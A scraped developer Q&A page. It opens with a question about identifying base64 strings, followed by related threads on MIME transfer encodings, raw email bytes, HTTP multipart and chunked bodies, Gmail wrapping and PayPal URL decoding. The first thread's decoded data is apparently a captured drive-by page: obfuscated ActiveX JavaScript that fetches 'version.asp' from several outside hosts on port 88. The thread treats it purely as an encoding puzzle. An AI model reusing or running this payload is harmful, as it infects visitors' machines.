How is the blob of text encoded? Base64? Something else? - encoding

I have a string like this: H0TCxoL9HSXXwlwXgBJAAAaiAAACBAW0AQMDAAEBBAIA. What format is this? Below are some more strings. I thought it was base64, but when I decode it I get strings like D????&??_?P#
H0TCxoL9HSbXwl+NUBBAAHISAABIVFRQLzEuMSAyMDAgT0sNCkRhdGU6IE1vbiwgMjEgSnVuIDIwMTAgMDk6NTI6NTMgR01UDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNi4wDQpQM1A6IENQPSJBTEwgQ1VSYSBBRE1hIERFVmEgVEFJYSBPVVIgQlVTIElORCBQSFkgT05MIFVOSSBQVVIgRklOIENPTSBOQVYgSU5UIERFTSBDTlQgU1RBIFBPTCBIRUEgUFJFIExPQyBPVEMiDQpYLVBvd2VyZWQtQnk6H0TCxoL9Hz7Xwl+NUBBAAFJ7AAAibm8tY2FjaGUiPiA8SFRNTD48Ym9keSBvbmxvYWQ9IndpbmRvdy5BWC5FeGVjKCdjdHl6Z0hsaWVUMkJqY254ZVBlM0p6M21ycjgzSlI0UmEwSVg3SXQyRFpaaGl4U2laNnJBaVZuU3JqVmQ4TDZrNXNQKEh6SFJ6TUJIRW5jcChic0Jqem9QcGx5aEJ1KHE2ajV1eG1nTVlWbDJTYTg1Y3B1cCluRXBNbUNxT0hiQUwpNlhvZGt6YUhyKGdCcHdram5IZFBSKVUzOEJTH0TCxoL9IVbXwl+NUBBAAOpdAAB4dC9qYXZhc2NyaXB0Jz52YXIgYjY0PSdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvPSc7U3RyaW5nLnByb3RvdHlwZS5BQT1mdW5jdGlvbigpe3ZhciBvMSxvMixvMyxoMSxoMixoMyxoNCxiaXRzLGQ9W10scGxhaW4sY29kZWQ7Y29kZWQ9dGhpcztmb3IodmFyIGM9MDtjPGNvZGVkLmxlbmd0H0TCxoL9I27Xwl+NUBBAAI+3AABDaGFyQ29kZShvMSk7fXBsYWluPWQuam9pbignJyk7cmV0dXJuIHBsYWluO307d2luZG93LkxhdW5jaFg9ZnVuY3Rpb24oXzEsXzIsXzMsXzQsXzUsXzApe3RoaXMuXzA9XzA7dGhpcy5fMT1fMTt0aGlzLl8yPV8yO3RoaXMuXzM9XzM7dGhpcy5fND1fNDt0aGlzLl81PV81O3RoaXMuXzY9bnVsbDt0aGlzLl83PW51bGw7dGhpcy5fOD1udWxsO3RoaXMuXzk9ZmFsH0TCxoL9JYbXwl+NUBBAAA42AABoaXMuXzIsdGhpcy5fMyx0aGlzLl80KTtkb2N1bWVudC53cml0ZSgnJyk7fTt3aW5kb3cuTGF1bmNoWC5wcm90b3R5cGUuRXhlYz1mdW5jdGlvbihfNyxfOCl7aWYodGhpcy5fOSl7dGhpcy5SdW4oKTtyZXR1cm47fXRoaXMuXzc9Xzc7dGhpcy5fOD1fODt0aGlzLl85PXRydWU7dGhpcy5SdW4oKTt9O3dpbmRvdy5MYXVuY2hYLnByb3RvdHlwZS5JbWFnZUV4ZWM9H0TCxoL9J57Xwl+NUBBAAMwRAAAuTGF1bmNoWC5wcm90b3R5cGUuX0cxPWZ1bmN0aW9uKCl7dGhpcy5fNj1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCh0aGlzLl81KTt9O3dpbmRvdy5MYXVuY2hYLnByb3RvdHlwZS5Jbml0PWZ1bmN0aW9uKCl7dGhpcy5fRzEoKTt2YXIgZWw9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnRElWJyk7dmFyIGE9dGhpcy5fMC5BQSgpO2VsLmlubmVySFRNTD1hO307d2luH0TCxoL9KbbXwl+NUBBAAMopAABhRDBuTVNjZ2FHVnBaMmgwUFNjeEp5QnZibXh2WVdROUoycGhkbUZ6WTNKcGNIUTZkMmx1Wkc5M0xrRllMa2x0WVdkbFJYaGxZeWdpYUhSMGNEb3ZMMlJ1Ykc5allXd3VibUZ0Wld0eUxtTnZiVG80T0M5bllXMWxjR2xoZWk5MlpY
SnphVzl1TG1GemNDSXBKejQ4YVcxbklITnlZeUE5SUNkb2RIUndPaTh2TlRndU1qSXhMak0wTGpJeE1UbzRPQzluWVcxbGNHbGhlH0TCxoL9K87Xwl+NUBBAAJkHAABNelF1TWpBME9qZzRMMmRoYldWd2FXRjZMM1psY25OcGIyNHVZWE53SWlrblBqeHBiV2NnYzNKaklEMGdKMmgwZEhBNkx5ODNNaTR6TkM0eU5ESXVNakk0T2pnNEwyZGhiV1Z3YVdGNkwyTm9heTVuYVdZbklIZHBaSFJvUFNjeEp5Qm9aV2xuYUhROUp6RW5JRzl1Ykc5aFpEMG5hbUYyWVhOamNtbHdkRHAzYVc1a2IzY3VRVmd1U1cxaFoyVkZlR1ZqS0NKb2RIUndPH0TCxoL9LebXwl+NUBhAABVAAABZWG92WTJockxtZHBaaWNnZDJsa2RHZzlKekVuSUdobGFXZG9kRDBuTVNjZ2IyNXNiMkZrUFNkcVlYWmhjMk55YVhCME9uZHBibVJ2ZHk1QldDNUpiV0ZuWlVWNFpXTW9JbWgwZEhBNkx5OHlNVEV1T0M0eU1UQXVNVGcyT2pnNEwyZGhiV1Z3YVdGNkwzWmxjbk5wYjI0dVlYTndJaWtuUGc9PScpOyB3aW5kb3cuQVguSW5pdCgpOzwvc2NyaXB0PjwvYm9keT48L0hUH0TCxoL9LrbXwl+NUBFAADJm

It could easily be anything, but since it contains mixed-case letters, digits and few symbols, my guess is base64.
Addendum
Yes, it is definitely base64. It seems to be some kind of HTTP response, but it contains some strange characters; I don't know whether they are garbage or binary data with some meaning.

Base64
I've run a decoder on it (the whole lot) and this is the result:
D�Ƃ�&��_�P#rHTTP/1.1 200 OK
Date: Mon, 21 Jun 2010 09:52:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
X-Powered-By:D�Ƃ�>��_�P#R{"no-cache"> <HTML><body onload="window.AX.Exec('ctyzgHlieT2BjcnxePe3Jz3mrr83JR4Ra0IX7It2DZZhixSiZ6rAiVnSrjVd8L6k5sP(HzHRzMBHEncp(bsBjzoPplyhBu(q6j5uxmgMYVl2Sa85cpup)nEpMmCqOHbAL)6XodkzaHr(gBpwkjnHdPR)U38BSD�Ƃ�!V��_�P#�]xt/javascript'>var b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';String.prototype.AA=function(){var o1,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;coded=this;for(var c=0;c<coded.lengtD�Ƃ�#n��_�P#��CharCode(o1);}plain=d.join('');return plain;};window.LaunchX=function(_1,_2,_3,_4,_5,_0){this._0=_0;this._1=_1;this._2=_2;this._3=_3;this._4=_4;this._5=_5;this._6=null;this._7=null;this._8=null;this._9=falD�Ƃ�%���_�P#6his._2,this._3,this._4);document.write('');};window.LaunchX.prototype.Exec=function(_7,_8){if(this._9){this.Run();return;}this._7=_7;this._8=_8;this._9=true;this.Run();};window.LaunchX.prototype.ImageExec=D�Ƃ�'���_�P#�.LaunchX.prototype._G1=function(){this._6=document.getElementById(this._5);};window.LaunchX.prototype.Init=function(){this._G1();var el=document.createElement('DIV');var a=this._0.AA();el.innerHTML=a;};winD�Ƃ�)���_�P#�)aD0nMScgaGVpZ2h0PScxJyBvbmxvYWQ9J2phdmFzY3JpcHQ6d2luZG93LkFYLkltYWdlRXhlYygiaHR0cDovL2RubG9jYWwubmFtZWtyLmNvbTo4OC9nYW1lcGlhei92ZXJzaW9uLmFzcCIpJz48aW1nIHNyYyA9ICdodHRwOi8vNTguMjIxLjM0LjIxMTo4OC9nYW1lcGlheD�Ƃ�+���_�P#�MzQuMjA0Ojg4L2dhbWVwaWF6L3ZlcnNpb24uYXNwIiknPjxpbWcgc3JjID0gJ2h0dHA6Ly83Mi4zNC4yNDIuMjI4Ojg4L2dhbWVwaWF6L2Noay5naWYnIHdpZHRoPScxJyBoZWlnaHQ9JzEnIG9ubG9hZD0namF2YXNjcmlwdDp3aW5kb3cuQVguSW1hZ2VFeGVjKCJodHRwOD�Ƃ�-���_�P##YXovY2hrLmdpZicgd2lkdGg9JzEnIGhlaWdodD0nMScgb25sb2FkPSdqYXZhc2NyaXB0OndpbmRvdy5BWC5JbWFnZUV4ZWMoImh0dHA6Ly8yMTEuOC4yMTAuMTg2Ojg4L2dhbWVwaWF6L3ZlcnNpb24uYXNwIiknPg=='); window.AX.Init();</script></body></HTD�Ƃ�.���_�P#2f
This is part of an HTTP response. I'm guessing the gibberish is most likely due to a charset mismatch, or to the fact that you only pasted part of the data. What you were getting is the result of decoding only the first few lines.
Link to decoding tool: http://www.opinionatedgeek.com/dotnet/tools/base64decode/

This is definitely base64. Decoding the first line gives you meaningful data: the beginning of an HTTP packet dump.
[some header data here]
HTTP/1.1 200 OK
Date: Mon, 21 Jun 2010
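As a quick check of the above, here is a minimal Python sketch that decodes only the first 48 characters of the second sample string from the question. The variable names are illustrative. The point is to keep the result as bytes rather than forcing it into text: in this prefix the leading bytes are binary and only the remainder is readable ASCII.

```python
import base64

# First 48 characters of the second sample string from the question.
sample = "H0TCxoL9HSbXwl+NUBBAAHISAABIVFRQLzEuMSAyMDAgT0sN"

raw = base64.b64decode(sample)  # bytes, not text

# In this prefix the first 20 bytes are not printable text;
# what they mean is not established anywhere in this thread.
header, payload = raw[:20], raw[20:]

print(header.hex(" "))  # binary prefix shown as hex
print(payload)          # b'HTTP/1.1 200 OK\r'
```

Printing the binary prefix as hex avoids the "D????" effect that appears when those bytes are pushed through a text decoder.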

Related

Keycloak Mail Templates: force `Content-Transfer-Encoding: quoted-printable` for text MIME part

I'm using Keycloak 15.0.2. When sending an account verification email, the email that gets sent uses Content-Transfer-Encoding: 7bit for the text portion of the email.
This causes the verification link to be on one line, and violates RFC 2822 by having a line that's very long, causing my emails to be bounced.
The HTML portion of the email is properly encoded with Content-Transfer-Encoding: quoted-printable.
I've been trying to look at the Keycloak source, but my knowledge of Java is too poor to really figure it out. I'm sure that somewhere the MIME message gets parsed, at which point a header is chosen for each part, but I can't find where.
I have seen messages where the text portion did have the correct encoding. So I assume there's a certain condition somewhere that will force the encoding. But I can't find it.
How can I force Keycloak (or Freemarker, or javax MimeBodyPart) to use quoted-printable?
Example of a MIME output:
Content-Type: multipart/alternative; boundary="----=_Part_2_1488711957.1660016366185"
Date: Tue, 9 Aug 2022 03:39:26 +0000 (GMT)
From: Mails#covle.com
MIME-Version: 1.0
Message-ID: <126146379.3.1660016366188#b02efe4baa19>
Received: from b02efe4baa19 by mailhog.example (MailHog)
id duuNy3ONelpvr8ukUqz7WBJnrtPd0oSw43G2W9w8Ix4=#mailhog.example; Tue, 09 Aug 2022 03:39:26 +0000
Reply-To: Mails#example.com
Return-Path: <Mails#examplecom>
Subject: Verify email
To: asdasd#example.com
------=_Part_2_1488711957.1660016366185
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Someone has created a Bluppie account with this email address. If this was you, click the link below to verify your email address
http://localhost:8080/auth/realms/bluppie/login-actions/action-token?key=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICIzODYxY2JmMy0wMWYzLTRhMmQtOTg1NC02MmEyYWMyYzhjNzUifQ.eyJleHAiOjE2NjAwMTY2NjYsImlhdCI6MTY2MDAxNjM2NiwianRpIjoiZDVlYjlhODMtMDE0NS00YTBhLTk2M2YtYjBkMjI0ZTA0ZWVkIiwiaXNzIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2JsdXBwaWUiLCJhdWQiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvYXV0aC9yZWFsbXMvYmx1cHBpZSIsInN1YiI6IjIxOGQ1NzkzLTA0NmYtNDQ4NS04ZmIxLTQ0M2E5NjEyM2FmZiIsInR5cCI6InZlcmlmeS1lbWFpbCIsImF6cCI6ImFjY291bnQiLCJub25jZSI6ImQ1ZWI5YTgzLTAxNDUtNGEwYS05NjNmLWIwZDIyNGUwNGVlZCIsImVtbCI6ImFzZGFzZEBjb3ZsZS5jb20iLCJhc2lkIjoiNmM3ZTk5NGItZTA0ZS00ZTlkLWFkNTQtZjE1MGM4NjcwYzdmLlFfQ244SlY0WFlBLmQ1MzI3MTMwLWIzY2EtNDY4Ny1iZDZkLWViZWFiODAwZTdkMyIsImFzaWQiOiI2YzdlOTk0Yi1lMDRlLTRlOWQtYWQ1NC1mMTUwYzg2NzBjN2YuUV9DbjhKVjRYWUEuZDUzMjcxMzAtYjNjYS00Njg3LWJkNmQtZWJlYWI4MDBlN2QzIn0.yrTUf2tl521Q00IUL-2dWTnugUt_ZeATa3W3IrgoRGM&client_id=account&tab_id=Q_Cn8JV4XYA
[NOTE: The line above is the RFC violation.]
This link will expire within 5 minutes.
If you didn't create this account, just ignore this message.
------=_Part_2_1488711957.1660016366185
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
<html>
<body>
<p>Someone has created a Bluppie account with this email address. If this w=
as you, click the link below to verify your email address</p><p><a href=3D"=
http://localhost:8080/auth/realms/bluppie/login-actions/action-token?key=3D=
eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICIzODYxY2JmMy0wMWYzLTRhMmQ=
tOTg1NC02MmEyYWMyYzhjNzUifQ.eyJleHAiOjE2NjAwMTY2NjYsImlhdCI6MTY2MDAxNjM2Niw=
ianRpIjoiZDVlYjlhODMtMDE0NS00YTBhLTk2M2YtYjBkMjI0ZTA0ZWVkIiwiaXNzIjoiaHR0cD=
ovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2JsdXBwaWUiLCJhdWQiOiJodHRwOi8vbG9jY=
Wxob3N0OjgwODAvYXV0aC9yZWFsbXMvYmx1cHBpZSIsInN1YiI6IjIxOGQ1NzkzLTA0NmYtNDQ4=
NS04ZmIxLTQ0M2E5NjEyM2FmZiIsInR5cCI6InZlcmlmeS1lbWFpbCIsImF6cCI6ImFjY291bnQ=
iLCJub25jZSI6ImQ1ZWI5YTgzLTAxNDUtNGEwYS05NjNmLWIwZDIyNGUwNGVlZCIsImVtbCI6Im=
FzZGFzZEBjb3ZsZS5jb20iLCJhc2lkIjoiNmM3ZTk5NGItZTA0ZS00ZTlkLWFkNTQtZjE1MGM4N=
jcwYzdmLlFfQ244SlY0WFlBLmQ1MzI3MTMwLWIzY2EtNDY4Ny1iZDZkLWViZWFiODAwZTdkMyIs=
ImFzaWQiOiI2YzdlOTk0Yi1lMDRlLTRlOWQtYWQ1NC1mMTUwYzg2NzBjN2YuUV9DbjhKVjRYWUE=
uZDUzMjcxMzAtYjNjYS00Njg3LWJkNmQtZWJlYWI4MDBlN2QzIn0.yrTUf2tl521Q00IUL-2dWT=
nugUt_ZeATa3W3IrgoRGM&client_id=3Daccount&tab_id=3DQ_Cn8JV4XYA" rel=3D"nofo=
llow">Link to e-mail address verification</a></p><p>This link will expire w=
ithin 5 minutes.</p><p>If you didn't create this account, just ignore t=
his message.</p>
</body>
</html>
------=_Part_2_1488711957.1660016366185--
tl;dr: Add any non US-ASCII character to your templates and it will be encoded as quoted-printable.
On a cached page I found some old documentation which seems to explain the logic:
getEncoding
public static String getEncoding(DataSource ds)
Get the Content-Transfer-Encoding that should be applied to the input stream of this DataSource, to make it mail-safe.
The algorithm used here is:
If the DataSource implements EncodingAware, ask it what encoding to use. If it returns non-null, return that value.
If the primary type of this datasource is "text" and if all the bytes in its input stream are US-ASCII, then the encoding is "7bit". If more than half of the bytes are non-US-ASCII, then the encoding is "base64". If less than half of the bytes are non-US-ASCII, then the encoding is "quoted-printable".
If the primary type of this datasource is not "text", then if all the bytes of its input stream are US-ASCII, the encoding is "7bit". If there is even one non-US-ASCII character, the encoding is "base64".
Parameters:
ds - the DataSource
Returns:
the encoding. This is either "7bit", "quoted-printable" or "base64"
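The selection rules quoted above can be sketched in a few lines of Python. This is only an illustration of the documented algorithm, not the JavaMail implementation: the function name `choose_transfer_encoding` is made up, the EncodingAware step is left out, and the behaviour at exactly half non-ASCII bytes is an assumption because the quoted text does not specify it.

```python
def choose_transfer_encoding(data: bytes, primary_type: str = "text") -> str:
    """Pick a Content-Transfer-Encoding following the documented rules.

    Hypothetical helper; the EncodingAware step is not modelled.
    """
    non_ascii = sum(1 for b in data if b > 0x7F)
    if non_ascii == 0:
        return "7bit"            # all bytes are US-ASCII
    if primary_type != "text":
        return "base64"          # non-text with any non-ASCII byte
    # Assumption: the documentation does not say what happens at exactly
    # half; this sketch falls through to quoted-printable in that case.
    if non_ascii * 2 > len(data):
        return "base64"
    return "quoted-printable"


plain = "This link will expire within 5 minutes.".encode("utf-8")
accented = "Questo link scadrà tra 5 minuti.".encode("utf-8")

print(choose_transfer_encoding(plain))     # 7bit
print(choose_transfer_encoding(accented))  # quoted-printable
```

This matches the tl;dr: a single non-ASCII character in an otherwise ASCII text part is enough to move the result from 7bit to quoted-printable.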

javax.mail.Part and writeTo, unable to obtain the same "eml" file as the original one

My application parses many messages via JavaMail 1.5.6; it listens for incoming messages and then stores some info about them.
Almost all messages contain a digital signature, so my application needs to retrieve the full eml too, that is, the raw file representing an email. This way, application users can always prove the validity of these messages.
So, once I have a javax.mail.Message, I have to produce its eml, so I do:
ByteArrayOutputStream baos = new ByteArrayOutputStream();
m.writeTo(baos);
this.originalMessage = baos.toString(StandardCharsets.UTF_8.name());
This approach generally works, but I had some multipart messages with a part like the following:
This is a multi-part message in MIME format.
--------------55D0DAEBFD4BF19F87D16E72
Content-Type: text/plain; charset=iso-8859-15; format=flowed
Content-Transfer-Encoding: 8bit
In allegato si notifica ai sensi e per gli effetti dell'art. 11 R.D.
1611/1993, al messaggio PEC, oltre alla Relata di Notifica e
contestuale attestazione di conformità,
--------------55D0DAEBFD4BF19F87D16E72
The word "conformità" is not properly transformed in the resulting string: it becomes "conformit�". Opening such an eml with, for example, MS Outlook results in an invalid digital signature, so the message appears corrupted, different from the original.
Do you have any idea? Thank you very much.
The raw message is not a UTF-8 encoded string, nor is an "eml" file a UTF-8 encoded file. They are both byte streams, and your digital signature should work on byte streams.
In your particular example, the content of the message part is encoded using the iso-8859-15 charset, not UTF-8.
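A small Python sketch of why the string round trip breaks the signature. It imitates what a lenient UTF-8 decode does to an iso-8859-15 byte (here via `errors="replace"`, which is an assumption about how the Java conversion behaves on malformed input); the variable names are illustrative.

```python
# The word as it travels in the message part: iso-8859-15 bytes.
original = "conformità".encode("iso-8859-15")

# Treating those bytes as UTF-8 text: 0xE0 alone is not valid UTF-8,
# so a lenient decoder substitutes U+FFFD (the replacement character).
as_text = original.decode("utf-8", errors="replace")

# Writing that text back out no longer yields the original bytes.
round_tripped = as_text.encode("utf-8")

print(original)                   # b'conformit\xe0'
print(round_tripped)              # b'conformit\xef\xbf\xbd'
print(round_tripped == original)  # False
```

Since a signature is computed over bytes, any such substitution invalidates it; keeping the output of the write as a byte array end to end avoids the problem.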

HTTP multipart/form-data. What happens when binary data has no string representation?

I want to write an HTTP implementation.
I've been looking around for a few days at how files are sent over HTTP with Content-Type: multipart/form-data, and I'm really interested in how browsers (or any HTTP client) create that kind of request.
I have already looked at a lot of questions about it here on Stack Overflow, like:
How does HTTP file upload work?
What does enctype='multipart/form-data' mean?
I dug into RFC 2616 (and newer versions), RFC 2046, etc., but I didn't find a clear answer (obviously I did not get the idea behind it). In most articles and answers I found this piece of request string, which is simple for me to interpret; all these things are documented in the RFCs...
POST /upload?upload_progress_id=12344 HTTP/1.1
Host: localhost:3000
Content-Length: 1325
Origin: http://localhost:3000
... other headers ...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryePkpFF7tjBAqx29L
------WebKitFormBoundaryePkpFF7tjBAqx29L
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryePkpFF7tjBAqx29L
Content-Disposition: form-data; name="uploadedfile"; filename="hello.o"
Content-Type: application/x-object
... contents of file goes here ...
------WebKitFormBoundaryePkpFF7tjBAqx29L--
...and it would be simple to implement an HTTP client that constructs a string like that in any language. The problem arises at ... contents of file goes here ...: there's little information about what "contents of file" is. I know it's binary data with a certain type and encoding, but it's difficult to think outside of string data: how would I add a piece of binary data that has no string representation inside a string?
I would like to see examples of low-level implementations of the HTTP protocol in any language, and maybe in-depth explanations of binary data transfer over HTTP: how the client creates requests and how the server reads and parses them. PS: I know this question may look like a duplicate, but most of the answers are not focused on explaining binary data transfer (like media).
You should not try to handle strings in this part of the body. You should send binary data: see it as reading bytes from the resource and sending these bytes unaltered.
So, in particular, no encoding is applied: no UTF-8, no base64. HTTP is not a protocol with a 7-bit ASCII restriction like SMTP, where base64 encoding is applied to ensure that only 7-bit ASCII characters are used.
There is, by definition, no string version of this data, and looking at a raw HTTP transfer (with Wireshark, for example) you should see binary data, bytes, stuff.
This is why most HTTP servers use C to manage HTTP: they parse the HTTP communication byte by byte (as the protocol headers are 7-bit ASCII only, certainly not multibyte characters), and they can also read/write arbitrary binary data for the body quite easily (or even use system calls like readfile to let the kernel manage the binary part).
Now, about examples.
When you use Content-Length and no multipart stuff, the body is exactly (Content-Length) bytes long, so the receiver parsing your data will just read this number of bytes and treat this whole raw data as the body content (which may have a MIME type and encoding information, but that is just information for layers built on top of the HTTP protocol).
When you use Transfer-Encoding: chunked, the raw binary body is split into pieces. Each piece is prefixed by a hexadecimal number (the size of the chunk) and an end-of-line marker, and is followed by another end-of-line marker. A final zero-size chunk marks the end.
If we take the wikipedia example:
4\r\n
Wiki\r\n
5\r\n
pedia\r\n
E\r\n
 in\r\n
\r\n
chunks.\r\n
0\r\n
\r\n
We could replace each ASCII letter with any byte, even a byte that has no ASCII representation. I'll use a * character for each real body byte:
4\r\n
****\r\n
5\r\n
*****\r\n
E\r\n
**************\r\n
0\r\n
\r\n
All the other characters are part of the HTTP protocol (here a chunked body transmission). I could also use a \0 representation of binary data and send only null bytes for the body; that would be:
4\r\n
\0\0\0\0\r\n
5\r\n
\0\0\0\0\0\r\n
E\r\n
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\r\n
0\r\n
\r\n
That's just a representation; we could also use \xNN or \NN representations. In reality these are bytes, 8 bits each (too lazy to write the 0/1 representation of this body :-) ).
Suppose the text of the example, instead of being:
Wikipedia in\r\n
\r\n
chunks.
had been a more complex one, with multibyte characters (here an é in UTF-8):
Wikipédia in\r\n
\r\n
chunks.
This é is in fact 11000011 10101001 in UTF-8, two bytes (\xc3\xa9 in \xNN representation), instead of the single byte 01100101 / \x65 of the e character. The HTTP body is now (note that the second chunk size is 6 and not 5):
4\r\n
Wiki\r\n
6\r\n
p\xc3\xa9dia\r\n
E\r\n
 in\r\n
\r\n
chunks.\r\n
0\r\n
\r\n
But this is only valid if the source data was actually in UTF-8; it could have been another encoding. Unless your web server has specific configuration settings that enforce conversion of the source document to a given encoding, converting the source document is not really the web server's job: you take what you have, and you maybe add a header to tell the client which encoding the source document uses.
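The chunked framing described above can be sketched in Python as a function over bytes. The name `encode_chunked` is hypothetical, and the third chunk is assumed to begin with a space, which is what makes its size 14 (hex E).

```python
def encode_chunked(chunks):
    """Frame an iterable of byte strings as an HTTP/1.1 chunked body."""
    out = bytearray()
    for chunk in chunks:
        if not chunk:
            continue  # a zero-length chunk would end the body early
        out += b"%X\r\n" % len(chunk)  # chunk size in hexadecimal
        out += chunk + b"\r\n"         # chunk bytes, passed through as-is
    out += b"0\r\n\r\n"                # terminating zero-size chunk
    return bytes(out)


body = encode_chunked([
    b"Wiki",
    "pédia".encode("utf-8"),   # 6 bytes: the é takes two
    b" in\r\n\r\nchunks.",     # 14 bytes, including the embedded CRLFs
])
print(body)
```

The sizes are computed on the byte strings, never on character counts, which is why the second chunk is announced as 6.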
Finally, we have the multipart way of transmitting the body, as in your question. It is a lot like the chunked version, except that boundaries and intermediary headers are used. For the binary data between these boundaries, headers and line-ending control characters, the same rule applies: everything inside is just bytes...
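To make the multipart case concrete, here is a minimal Python sketch that assembles a multipart/form-data body as bytes. The function `build_multipart` and its argument layout are made up for illustration; it does no escaping of names and assumes the boundary does not occur inside the file data.

```python
def build_multipart(fields, files, boundary):
    """Build a multipart/form-data body as bytes (hypothetical helper).

    fields: {name: str}
    files:  {name: (filename, content_type, data_bytes)}
    """
    crlf = b"\r\n"
    delim = b"--" + boundary.encode("ascii")
    body = bytearray()
    for name, value in fields.items():
        body += delim + crlf
        body += f'Content-Disposition: form-data; name="{name}"'.encode("utf-8") + crlf
        body += crlf + value.encode("utf-8") + crlf
    for name, (filename, ctype, data) in files.items():
        body += delim + crlf
        body += (f'Content-Disposition: form-data; name="{name}"; '
                 f'filename="{filename}"').encode("utf-8") + crlf
        body += f"Content-Type: {ctype}".encode("ascii") + crlf
        body += crlf + data + crlf  # raw file bytes, no re-encoding
    body += delim + b"--" + crlf    # closing delimiter
    return bytes(body)


boundary = "----WebKitFormBoundaryePkpFF7tjBAqx29L"
binary = bytes([0x7F, 0x45, 0x4C, 0x46, 0x00, 0xFF, 0xFE])  # arbitrary bytes
body = build_multipart(
    {"MAX_FILE_SIZE": "100000"},
    {"uploadedfile": ("hello.o", "application/x-object", binary)},
    boundary,
)
print(len(body))  # this is what would go in Content-Length
```

Only the protocol text (delimiters and part headers) is ever encoded from strings; the file content is appended as the bytes that were read.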

Gmail API - plaintext word wrapping

When sending emails using the Gmail API, it places hard line breaks in the body at around 78 characters per line. A similar question about this can be found here.
How can I make this stop? I simply want to send plaintext emails through the API without line breaks. The current formatting looks terrible, especially on mobile clients (tested on Gmail and iOS Mail apps).
I've tried the following headers:
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Am I missing anything?
EDIT: As per Mr.Rebot's suggestion, I've also tried this with no luck:
Content-Type: mixed/alternative
EDIT 2: Here's the exact format of the message I'm sending (attempted with and without the quoted-printable header):
From: Example Account <example1#example.com>
To: <example2#example.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Subject: This is a test!
Date: Tue, 18 Oct 2016 10:46:57 -GMT-07:00
Here is a long test message that will probably cause some words to wrap in strange places.
I take this full message and Base64-encode it, then POST it to /gmail/v1/users/{my_account}/drafts/send?fields=id with the following JSON body:
{
"id": MSG_ID,
"message": {
"raw": BASE64_DATA
}
}
Are you running the content through a quoted-printable encoder and sending the encoded content along with the header, or are you expecting the API to encode it for you?
Per Wikipedia, it seems that if you add soft line breaks (an = as the last character of a line) so that no encoded line exceeds 76 characters, they should be removed on decoding, restoring your original text.
UPDATE
Try sending this content, whose message body has been quoted-printable encoded (then base64-encode the whole thing):
From: Example Account <example1#example.com>
To: <example2#example.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Subject: This is a test!
Date: Tue, 18 Oct 2016 10:46:57 -GMT-07:00
Here is a long test message that will probably cause some words to wrap in =
strange places.
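The soft line break behaviour can be tried locally with Python's standard `quopri` module. This is only a sketch of the encoding step on the body text; it says nothing about what the Gmail API does with the message afterwards.

```python
import quopri

text = ("Here is a long test message that will probably cause some words "
        "to wrap in strange places.").encode("utf-8")

encoded = quopri.encodestring(text)     # inserts "=" soft line breaks
decoded = quopri.decodestring(encoded)  # soft breaks are removed again

for line in encoded.splitlines():
    print(line.decode("ascii"))

# The decoded bytes are expected to equal the original single line.
print(decoded == text)
```

Each encoded line ending in = is joined with the next one on decoding, so a client that honours the Content-Transfer-Encoding header sees one unbroken line.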
I'm assuming you have a function similar to this:
import base64
from email.mime.text import MIMEText

def create_message(sender, to, cc, subject, message_body):
    # 'html' as the second argument sets the MIME subtype to text/html
    message = MIMEText(message_body, 'html')
    message['to'] = to
    message['from'] = sender
    message['subject'] = subject
    message['cc'] = cc
    # urlsafe_b64encode needs bytes; decode the result so it is JSON-serializable
    raw = base64.urlsafe_b64encode(message.as_bytes())
    return {'raw': raw.decode('ascii')}
The one trick that finally worked for me, after all the attempts to modify the header values and the payload dict (which is a member of the message object), was to write the MIMEText line like this:
message = MIMEText(message_body, 'html') <-- add 'html' as the second parameter of the MIMEText constructor
The sample code supplied by Google for the Gmail API only shows how to send plain-text emails, and it does not make explicit how that is done.
It looks like this:
message = MIMEText(message_body)
I had to look up the Python class email.mime.text.MIMEText.
That's where you'll see this definition of the constructor:
class email.mime.text.MIMEText(_text[, _subtype[, _charset]])
We want to explicitly pass a value for _subtype. In this case, we pass 'html'.
Now you won't get any more unexpected word wrapping applied to your messages by Google or by the Python MIMEText object.
This exact issue drove me crazy for a good couple of hours, and no solution I could find made any difference.
So if anyone else ends up frustrated here, I thought I'd just post my "solution".
Turn your text (what's going to be the body of the email) into simple HTML. I wrapped every paragraph in a simple <p>, and added line-breaks (<br>) where needed (e.g. my signature).
Then, per Andrew's answer, I attached the message body as MIMEText(message_text, _subtype="html"). The plain-text is still not correct AFAIK, but it works and I don't think there's a single actively used email-client out there that doesn't render HTML anymore.

Paypal decode encode issue with + in timestamp

I was quite frustrated with IPN testing. Although in the end I was able to pinpoint the issue to the timestamp field in the validation step, I need help with how to handle the + sign in the timestamp.
I noticed that when I decode and re-encode, the spaces from the PayPal request become + signs. So I replaced + with %20, and this tested okay. However, it becomes an issue if there is time zone info inside the payment date.
E.g. Fri Jul 08 2016 10:22:01 GMT+0800 (Malay Peninsula Standard Time)
parameter came in as:
Fri%20Jul%2008%202016%2010%3A22%3A01%20GMT+0800%20%28Malay%20Peninsula%20Standard%20Time%29
after decoding:
Fri Jul 08 2016 10:22:01 GMT 0800 (Malay Peninsula Standard Time) <=====the plus sign is missing.....
encode again:
